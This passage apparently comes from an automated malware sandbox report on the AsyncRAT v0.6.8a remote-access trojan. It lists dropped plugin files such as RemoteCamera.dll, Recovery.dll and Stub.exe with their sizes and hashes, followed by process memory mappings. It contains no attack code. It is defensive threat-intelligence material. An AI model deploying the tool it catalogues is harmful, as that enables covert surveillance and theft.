                                                                                                            c860f7d71307487badb04c598a2f20e25dc8f4275e4b1960af9470bcc97f9258

                                                                                                            SHA512

                                                                                                            01514c6331b2a82e711f516c62a07508b8047ebfd5cf8b224e6a6dfed2ce3d55c25f3b1fd7ef61ba20ddb279db5c83fc517fdf7b02249b2f450728702d748cfe

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Miscellaneous.dll

                                                                                                            Filesize

                                                                                                            252KB

                                                                                                            MD5

                                                                                                            1b4ed003e8eadd108d0fb7ff62e9a265

                                                                                                            SHA1

                                                                                                            57234ce5eac96bae65bc750ed1d861ba1755cfa1

                                                                                                            SHA256

                                                                                                            386f31ed9819f8e7741bda6648f83f9d1148bb4737b2d0a2d919ccfda7bfba3f

                                                                                                            SHA512

                                                                                                            d53388d7d006176fb5d526e04b65db6da01aacf490a6821758eabb44289e11f599ecc563e70f95d32bf978937f413f50cc7bcbf225e9c217dc701e6292ce1251

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Options.dll

                                                                                                            Filesize

                                                                                                            115KB

                                                                                                            MD5

                                                                                                            6ec0477145599f7309dc4314086da289

                                                                                                            SHA1

                                                                                                            95a0782d2839614c06a09afe07ee0103683f9b53

                                                                                                            SHA256

                                                                                                            ca16f7b56727feb51ff803d4cae5af1e59591cda18d1cd03ba8644962e10469b

                                                                                                            SHA512

                                                                                                            c1a5693b56df37c035228573e7407f90fb9d647cdf65d4bffeb5e2c210b480395ded8334e2d07026d66c043bb77c9c2318500871941e622e6b12d6a22dad680c

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\ProcessManager.dll

                                                                                                            Filesize

                                                                                                            104KB

                                                                                                            MD5

                                                                                                            cf7117a7231d2333f2026ed8ed95b390

                                                                                                            SHA1

                                                                                                            5158854dde9de34d0c33cff9b41cd41f65d6515e

                                                                                                            SHA256

                                                                                                            4ee39209212bf88fb4f1465f1fef028c67c9d5c4e901dd24124406b963d75d88

                                                                                                            SHA512

                                                                                                            6a006094862d95e97928047cab62defb85c6e05918ce1b4004d993c8846f2cab8a76674f5e6ed9da24b831f871561887703bcab66645397e67e6fb2059a0ef0f

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Recovery.dll

                                                                                                            Filesize

                                                                                                            481KB

                                                                                                            MD5

                                                                                                            6433a01e81e2d97eef94878e1cd0f381

                                                                                                            SHA1

                                                                                                            93e9469789a4ecd28e30006d1ce10dbffbd36d7c

                                                                                                            SHA256

                                                                                                            405813d04b53574ab8c9721795e9fd705273487c852b7f4545fb875da09c7350

                                                                                                            SHA512

                                                                                                            88f96847bbb16ce171d58123718a55305f163ac94826105ac0f16dc67a6a4ece4079f99b01da7af36cb75faf5d51b2c37223e23a9a64b3b7c6cf5311cef5e502

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteCamera.dll

                                                                                                            Filesize

                                                                                                            168KB

                                                                                                            MD5

                                                                                                            5b3064600ab1ad728d3384442319c76a

                                                                                                            SHA1

                                                                                                            b8219b194b4244dee5153808664d1fe5c3270abe

                                                                                                            SHA256

                                                                                                            9a7228a2f18e18531831915e441831579d67f0466075a3df94096e17adfa4d92

                                                                                                            SHA512

                                                                                                            5e1d37f4e0a4697668bacd2f4bd7375d16d43c854c7b2db38f52b50ababb72b6143e5c30c6b57e3e78ae3e3060e4d043fb4c1f607f25cbde7697896edb6be54c

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteDesktop.dll

                                                                                                            Filesize

                                                                                                            125KB

                                                                                                            MD5

                                                                                                            53d67016fed1d45e2f00fd77c02b1ed6

                                                                                                            SHA1

                                                                                                            b13cb342b6faaacba0e9d98dfdaf3fd21a31ba2a

                                                                                                            SHA256

                                                                                                            51b6c6b17b4ee2e99883640e3763c27e48af1fb0562c8e75b2a5a8bbeea9039f

                                                                                                            SHA512

                                                                                                            8fd6961164702162229684d4a1cb0169e0423c3fab9fd7028bc1d4e74283901c25b09fcf1e3175f686ff937511e157bd91243d86aaefb4afbdd98cf14f4763fd

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendFile.dll

                                                                                                            Filesize

                                                                                                            106KB

                                                                                                            MD5

                                                                                                            61a1eaa8ff6939aa3e3092da71707698

                                                                                                            SHA1

                                                                                                            8988ee9d1b9e2287082d542ae57bec82cd244749

                                                                                                            SHA256

                                                                                                            4e47c429c681b3a23cf9bf8cdf60cab79fbeddb88b39b406a61ce21097dd7fe6

                                                                                                            SHA512

                                                                                                            a2c381de66961ca731e1ea8f9fad854efa7ccd0ef06ec884f9354b8cd65478b7bb26ea7a135751d64322d6fbb6a2680d2664126ca77cac5a9797d8ad936a946d

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendMemory.dll

                                                                                                            Filesize

                                                                                                            107KB

                                                                                                            MD5

                                                                                                            53ea349b47e931750088bd7d936e226e

                                                                                                            SHA1

                                                                                                            9efb3ce1d6ae86c3089695f890d6ce2f29e070c9

                                                                                                            SHA256

                                                                                                            c419e685c36695d159a06c55d4fe0d6ba4c393b63fa8e74c3241067b205b38cf

                                                                                                            SHA512

                                                                                                            9f820c71254d6446ba40fb724ba4f1341bc833b5bcfd6054506437ef470f296024d802364fbdcec890b2c89aedb0988cc19101e66e4f4504788ef99bdafd04bd

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Stub\Stub.exe

                                                                                                            Filesize

                                                                                                            38KB

                                                                                                            MD5

                                                                                                            5fbd8561540a6246de5e402214da86d0

                                                                                                            SHA1

                                                                                                            65b29f52856448ec781efce09bb7f9ae3ffcf63d

                                                                                                            SHA256

                                                                                                            dbadd138fcadb07f4be4f21666e2a17ac9821a13be6f6bf139808255919ed3cb

                                                                                                            SHA512

                                                                                                            765e979688ddf1bc9bc6067467e49139d45248bef9b8221ac95cdffadcb981446888ad9a77fc56e1c4d7a4587c7202901c3c2432821dc5c8507d378364ff48fb

                                                                                                          • C:\Windows\SysWOW64\AsyncRAT v0.6.8a\instruction.rtf

                                                                                                            Filesize

                                                                                                            6KB

                                                                                                            MD5

                                                                                                            69ac56a07ff2c2c16d7bd06f66827a04

                                                                                                            SHA1

                                                                                                            e04ca2dce4489738da316bdc0384049043ce01bb

                                                                                                            SHA256

                                                                                                            43d045c8779008d190e3258e744c57e670ba8009b1bf24f6ade23ae6e04d134a

                                                                                                            SHA512

                                                                                                            de3a3389adff2916633854b9e6ff3edc5972ab63e7e4c1bfdcee96539c1f485ca0248f4fb4b975fc029f8343c4bd555ee3336ab1f82651cfe8cfa392ba31cdcb

                                                                                                          • memory/432-273-0x0000000000000000-mapping.dmp

                                                                                                          • memory/456-272-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1000-287-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1052-231-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1124-148-0x0000000005260000-0x0000000005282000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/1124-202-0x00000000074F0000-0x00000000074FA000-memory.dmp

                                                                                                            Filesize

                                                                                                            40KB

                                                                                                          • memory/1124-188-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/1124-143-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1324-149-0x0000000005B00000-0x0000000005B66000-memory.dmp

                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/1324-144-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1588-286-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1728-138-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1728-172-0x00000000070D0000-0x0000000007166000-memory.dmp

                                                                                                            Filesize

                                                                                                            600KB

                                                                                                          • memory/1728-176-0x0000000007720000-0x0000000007CC4000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.6MB

                                                                                                          • memory/1736-282-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1824-186-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1844-173-0x0000000006250000-0x000000000626A000-memory.dmp

                                                                                                            Filesize

                                                                                                            104KB

                                                                                                          • memory/1844-140-0x0000000000000000-mapping.dmp

                                                                                                          • memory/1844-151-0x0000000005D60000-0x0000000005D7E000-memory.dmp

                                                                                                            Filesize

                                                                                                            120KB

                                                                                                          • memory/1844-147-0x0000000004ED0000-0x00000000054F8000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.2MB

                                                                                                          • memory/2164-177-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2164-279-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2252-277-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2280-190-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/2280-142-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2312-288-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2312-171-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2412-217-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/2412-196-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2424-139-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2468-174-0x00000000068C0000-0x00000000068E2000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/2468-141-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2644-146-0x0000000005060000-0x0000000005096000-memory.dmp

                                                                                                            Filesize

                                                                                                            216KB

                                                                                                          • memory/2644-200-0x0000000007FA0000-0x000000000861A000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.5MB

                                                                                                          • memory/2644-136-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2644-194-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/2648-271-0x0000000000000000-mapping.dmp

                                                                                                          • memory/2772-221-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3012-180-0x0000000006B80000-0x0000000006BB2000-memory.dmp

                                                                                                            Filesize

                                                                                                            200KB

                                                                                                          • memory/3012-189-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/3012-150-0x0000000005FA0000-0x0000000006006000-memory.dmp

                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/3012-193-0x0000000006A00000-0x0000000006A1E000-memory.dmp

                                                                                                            Filesize

                                                                                                            120KB

                                                                                                          • memory/3012-137-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3012-229-0x0000000007C80000-0x0000000007C9A000-memory.dmp

                                                                                                            Filesize

                                                                                                            104KB

                                                                                                          • memory/3056-197-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3056-218-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/3056-235-0x0000000007220000-0x000000000723A000-memory.dmp

                                                                                                            Filesize

                                                                                                            104KB

                                                                                                          • memory/3084-153-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3100-276-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3116-135-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3128-275-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3360-256-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3448-192-0x0000000000000000-mapping.dmp

                                                                                                          • memory/3800-244-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4212-210-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/4212-178-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4328-133-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4356-220-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/4356-199-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4360-243-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4384-198-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4404-183-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4484-195-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4516-237-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4636-240-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4764-213-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/4764-179-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4764-228-0x0000000007660000-0x000000000766E000-memory.dmp

                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/4924-236-0x0000000000000000-mapping.dmp

                                                                                                          • memory/4936-280-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5044-145-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5044-191-0x00000000706F0000-0x000000007073C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/5044-230-0x0000000007370000-0x000000000737E000-memory.dmp

                                                                                                            Filesize

                                                                                                            56KB

                                                                                                          • memory/5044-238-0x00000000073B0000-0x00000000073B8000-memory.dmp

                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/5180-248-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5188-253-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5264-245-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5316-225-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5336-246-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5388-247-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5484-234-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5556-285-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5576-274-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5596-207-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5624-208-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5636-278-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5644-281-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5848-239-0x0000000000000000-mapping.dmp

                                                                                                          • memory/5928-284-0x0000000000000000-mapping.dmp

                                                                                                          • memory/6000-283-0x0000000000000000-mapping.dmp

                                                                                                          • memory/6028-242-0x0000000000000000-mapping.dmp

                                                                                                          • memory/6036-241-0x0000000000000000-mapping.dmp

                                                                                                          • memory/6088-212-0x0000000000000000-mapping.dmp